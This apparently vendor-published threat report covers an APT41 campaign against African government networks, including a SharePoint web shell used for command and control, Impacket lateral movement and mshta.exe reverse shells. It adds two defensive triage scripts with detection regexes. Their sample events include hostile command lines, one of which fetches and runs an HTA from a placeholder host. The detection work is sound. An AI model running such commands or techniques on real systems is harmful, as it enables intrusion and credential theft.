Who Is Behind the Attacks?
A well-known Chinese cyber espionage group, APT41, has launched a new campaign in Africa, targeting government IT infrastructure.
The researchers who uncovered the activity reported that the attackers embedded hardcoded internal IP addresses, service names, and proxy paths in their malware, and that they repurposed an internal SharePoint server as a command-and-control (C2) hub for issuing commands.
While APT41 has attacked many sectors globally, including telecom, finance, healthcare, and education, this is one of the group's first major operations focused on Africa, a shift that suggests expanding geopolitical interests and growing technical capabilities.
How the Attack Began
The operation came to light when researchers spotted suspicious activity on a government IT network. They traced it to a compromised host that was not under monitoring, which the attackers were using to run commands against the rest of the network.
Soon after gaining a foothold, the group used Impacket, an open-source Python toolkit used by penetration testers and attackers alike, to escalate privileges and move laterally. Its WmiExec and Atexec modules execute commands on remote hosts through WMI and the Task Scheduler service respectively, so one set of stolen credentials can reach every machine that accepts them.
They then deployed Cobalt Strike through DLL side-loading, in which a legitimately signed executable is made to load a malicious DLL placed beside it. Cobalt Strike is a commercial red-team framework that real-world threat actors routinely abuse.
How APT41 Avoids Detection
Before running, the malware checks which language packs are installed and aborts if it finds Chinese, Japanese, or Korean ones. Such language checks are a common way for operators to avoid infecting systems in their own region or in countries they do not intend to target.
The attackers also turned an internal SharePoint server into a C2 platform by installing a web shell named CommandHandler.aspx. Through it they relayed commands to infected hosts and collected the results, so the C2 traffic appeared as ordinary HTTP requests to a trusted internal server.
Over SMB, they distributed C# implants under the names agents.exe and agentx.exe. These implants fetched commands from the compromised SharePoint server and executed them, blending the covert activity into the traffic of a legitimate internal service.
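One way to hunt for this pattern on a SharePoint front end is to triage the IIS W3C logs for .aspx handlers that should not exist and that receive POST traffic from many hosts without a browser user agent. The script below is an added example written for this page, not code from the researchers or from the campaign. The log excerpt is constructed (the only name taken from the report is CommandHandler.aspx), and the baseline of known pages under /_layouts/ is an assumed allowlist; in practice you would build it from a clean SharePoint installation or from historical logs.

```python
"""Triage IIS W3C logs from a SharePoint front end for web-shell style C2."""
from collections import defaultdict

# Constructed IIS W3C log excerpt for the example; not taken from the incident.
# IIS writes '+' in place of spaces inside the user-agent field.
SAMPLE_LOG = """\
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip cs(User-Agent) sc-status
2025-07-01 08:00:01 GET /_layouts/15/start.aspx - 10.10.5.21 Mozilla/5.0+(Windows+NT+10.0) 200
2025-07-01 08:00:02 POST /_layouts/15/Authenticate.aspx - 10.10.5.21 Mozilla/5.0+(Windows+NT+10.0) 302
2025-07-01 08:00:03 GET /sites/hr/Pages/default.aspx - 10.10.5.22 Mozilla/5.0+(Windows+NT+10.0) 200
2025-07-01 08:00:04 POST /_layouts/15/CommandHandler.aspx - 10.10.7.40 - 200
2025-07-01 08:00:05 POST /_layouts/15/CommandHandler.aspx - 10.10.7.41 - 200
2025-07-01 08:00:06 POST /_layouts/15/CommandHandler.aspx - 10.10.7.42 - 200
2025-07-01 08:00:07 POST /_layouts/15/CommandHandler.aspx - 10.10.7.40 - 200
2025-07-01 08:00:08 GET /_layouts/15/CommandHandler.aspx - 10.10.7.43 - 200
"""

# Assumed allowlist of legitimate pages under /_layouts/ (hypothetical baseline).
# /_layouts/ maps to the LAYOUTS folder of the SharePoint root on disk, which is
# where a dropped .aspx file becomes reachable without any site configuration.
KNOWN_LAYOUTS_PAGES = {
    "/_layouts/15/start.aspx",
    "/_layouts/15/Authenticate.aspx",
}

BROWSER_UA_MARKERS = ("Mozilla/", "Opera/")


def parse_w3c(text):
    """Yield one dict per request line, naming columns from the #Fields: header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#"):
            continue
        values = line.split()
        if fields is None or len(values) != len(fields):
            continue  # malformed line; a real pipeline would count and report these
        yield dict(zip(fields, values))


def triage_sharepoint_log(text, min_clients=3):
    """Return suspicious .aspx handlers with the reasons they were flagged."""
    per_stem = defaultdict(lambda: {"posts": 0, "clients": set(), "non_browser": 0})
    for req in parse_w3c(text):
        stem = req["cs-uri-stem"]
        if not stem.lower().endswith(".aspx"):
            continue
        stat = per_stem[stem]
        stat["clients"].add(req["c-ip"])
        if req["cs-method"] == "POST":
            stat["posts"] += 1
        if not req["cs(User-Agent)"].startswith(BROWSER_UA_MARKERS):
            stat["non_browser"] += 1

    findings = []
    for stem, stat in per_stem.items():
        reasons = []
        # Rule 1: a handler under /_layouts/ that is not part of the known baseline.
        if stem.lower().startswith("/_layouts/") and stem not in KNOWN_LAYOUTS_PAGES:
            reasons.append("page under /_layouts/ not in baseline")
        # Rule 2: POSTs from several distinct hosts that do not identify as browsers,
        # the shape implant-to-web-shell traffic tends to have.
        if stat["posts"] and len(stat["clients"]) >= min_clients and stat["non_browser"]:
            reasons.append(
                "POST traffic from %d hosts with non-browser user agents"
                % len(stat["clients"])
            )
        if reasons:
            findings.append({
                "stem": stem,
                "posts": stat["posts"],
                "clients": sorted(stat["clients"]),
                "reasons": reasons,
            })
    return findings


if __name__ == "__main__":
    for f in triage_sharepoint_log(SAMPLE_LOG):
        print(f["stem"], f["posts"], "POSTs from", f["clients"])
        for reason in f["reasons"]:
            print("  -", reason)
```

Rule 1 alone is cheap and high-signal on servers whose LAYOUTS folder is change-controlled; Rule 2 catches a web shell even when it is dropped under a site path that the baseline does not cover, at the cost of needing a few infected hosts to talk to it first.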
Living-off-the-Land and Reverse Shells
This campaign combined traditional malware with living-off-the-land techniques. Instead of relying only on external infrastructure, the attackers used existing internal services to control infected systems.
They also used mshta.exe, a signed Windows binary, to run HTML Application (HTA) files fetched from a domain impersonating GitHub. The HTA files carried JavaScript payloads that opened reverse shells, giving the attackers an interactive channel for running further commands remotely.
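The Impacket lateral movement described under "How the Attack Began" and the mshta.exe reverse shells described here both leave recognisable fingerprints in process-creation telemetry such as Sysmon Event ID 1. The triage script below is an added example written for this page, not code from the researchers or from the campaign. Its heuristics encode the default behaviour of Impacket's wmiexec.py (cmd.exe spawned under WmiPrvSE.exe with output redirected to an `__<timestamp>` file on ADMIN$ via 127.0.0.1) and atexec.py (cmd.exe launched by the Task Scheduler service with output redirected to a .tmp file under the Windows Temp folder), plus mshta.exe being handed a remote URL; an operator who changes those defaults will evade them. The events and hostnames are constructed and the URL is a placeholder.

```python
"""Heuristic triage of process-creation events (Sysmon Event ID 1 style) for
Impacket wmiexec/atexec artifacts and mshta.exe loading remote HTA files."""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    host: str
    parent_image: str
    image: str
    command_line: str


def _basename(path):
    return path.rsplit("\\", 1)[-1].lower()


# wmiexec.py default: cmd.exe under the WMI provider host, output redirected to
# an "__<epoch>" file on the ADMIN$ share reached through the loopback address.
WMIEXEC_REDIRECT = re.compile(r"\\\\127\.0\.0\.1\\ADMIN\$\\__\d+(\.\d+)?\s+2>&1", re.I)
# atexec.py default: cmd.exe /C <command> launched by the Task Scheduler service
# (hosted in svchost.exe), output redirected to %windir%\Temp\<random>.tmp.
ATEXEC_REDIRECT = re.compile(
    r">\s*(%windir%|[a-z]:\\windows)\\temp\\[^\s\\]+\.tmp\s+2>&1", re.I
)
# mshta.exe given an http(s) URL fetches and runs the HTA from the network.
REMOTE_HTA = re.compile(r"\bhttps?://", re.I)


def classify(ev):
    """Return the name of the first matching heuristic, or None."""
    image = _basename(ev.image)
    parent = _basename(ev.parent_image)
    cmd = ev.command_line
    if image == "cmd.exe" and parent == "wmiprvse.exe" and WMIEXEC_REDIRECT.search(cmd):
        return "impacket-wmiexec"
    if image == "cmd.exe" and parent == "svchost.exe" and ATEXEC_REDIRECT.search(cmd):
        return "impacket-atexec"
    if image == "mshta.exe" and REMOTE_HTA.search(cmd):
        return "mshta-remote-hta"
    return None


def triage(events):
    """Return one finding per event that matches a heuristic, in input order."""
    return [
        {"host": e.host, "rule": rule, "command_line": e.command_line}
        for e in events
        if (rule := classify(e))
    ]


# Constructed sample events; hostnames, paths and the URL are placeholders.
SAMPLE_EVENTS = [
    ProcEvent("FS01", r"C:\Windows\System32\wbem\WmiPrvSE.exe", r"C:\Windows\System32\cmd.exe",
              r"cmd.exe /Q /c whoami 1> \\127.0.0.1\ADMIN$\__1720000000.12 2>&1"),
    ProcEvent("DC02", r"C:\Windows\System32\svchost.exe", r"C:\Windows\System32\cmd.exe",
              r"cmd.exe /C net localgroup administrators > %windir%\Temp\qWeRtYuI.tmp 2>&1"),
    ProcEvent("WS17", r"C:\Windows\explorer.exe", r"C:\Windows\System32\mshta.exe",
              r"mshta.exe https://updates.example.test/patch.hta"),
    # Benign look-alikes: an interactive redirect, a scheduled script, a local HTA.
    ProcEvent("WS17", r"C:\Windows\explorer.exe", r"C:\Windows\System32\cmd.exe",
              r"cmd.exe /c dir 1> C:\Users\bob\out.txt 2>&1"),
    ProcEvent("WS03", r"C:\Windows\System32\svchost.exe", r"C:\Windows\System32\cmd.exe",
              r"cmd.exe /C C:\Scripts\nightly-backup.cmd"),
    ProcEvent("WS03", r"C:\Windows\explorer.exe", r"C:\Windows\System32\mshta.exe",
              r"mshta.exe C:\Users\bob\Documents\report.hta"),
]


if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(f"{finding['host']:6} {finding['rule']:18} {finding['command_line']}")
```

The parent-process condition matters: a redirect to ADMIN$ typed by an administrator at a console has explorer.exe or conhost-related ancestry, while wmiexec always arrives via WmiPrvSE.exe. For mshta.exe the cheaper control is to block it outright with application control on hosts that have no business running HTAs, and alert on any exception.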
Tools Used in the Attack
APT41 used both custom-built malware and publicly available tools during this operation. These tools helped gather data, steal credentials, and exfiltrate information.
Key tools included:
- Pillager (modified): Captured credentials, screenshots, SSH sessions, browser data, and system info
- Checkout: Stole downloaded files, saved credit card info, and browser activity
- RawCopy: Copied locked registry hive files (such as SAM and SYSTEM) straight from the raw NTFS volume, bypassing the locks Windows holds on them
- Mimikatz: Extracted credentials and hashes from memory
- Cobalt Strike: Provided post-exploitation command and control
These tools were carefully tailored to blend in and exploit internal weaknesses.
Adaptive Techniques and Long-Term Presence
APT41 is known for its ability to adapt. In this campaign, the group customized its tools for the specific environment.
They studied the victim's configuration and adjusted the malware's behavior to the local infrastructure, hardcoding internal IP addresses, service names, and proxy paths. By routing C2 through internal services such as SharePoint and by refusing to run on hosts with Chinese, Japanese, or Korean language packs, the group kept a low profile and maintained persistence.
Much of their toolset (Impacket, Cobalt Strike, Mimikatz) is the same tooling used in authorized red-team engagements, so its presence alone is not conclusive and traditional security teams may dismiss or misattribute the activity. That overlap between testing tools and live intrusions is itself a serious risk.
How to Stay Protected
To guard against attacks of this kind, organizations should focus on early detection and response. Monitoring for new or unexpected .aspx handlers on SharePoint servers, remote command execution over WMI and scheduled tasks, executables written to SMB admin shares, and mshta.exe fetching remote content is essential.
Endpoint solutions that detect anomalous command execution, credential harvesting, and lateral movement can block malicious actions before they escalate.
Advanced cybersecurity platforms now offer behavior-based monitoring, automated threat isolation, and real-time forensic tools. These features help stop stealthy operations like APT41 before attackers gain full control.
Sleep well, we got you covered.

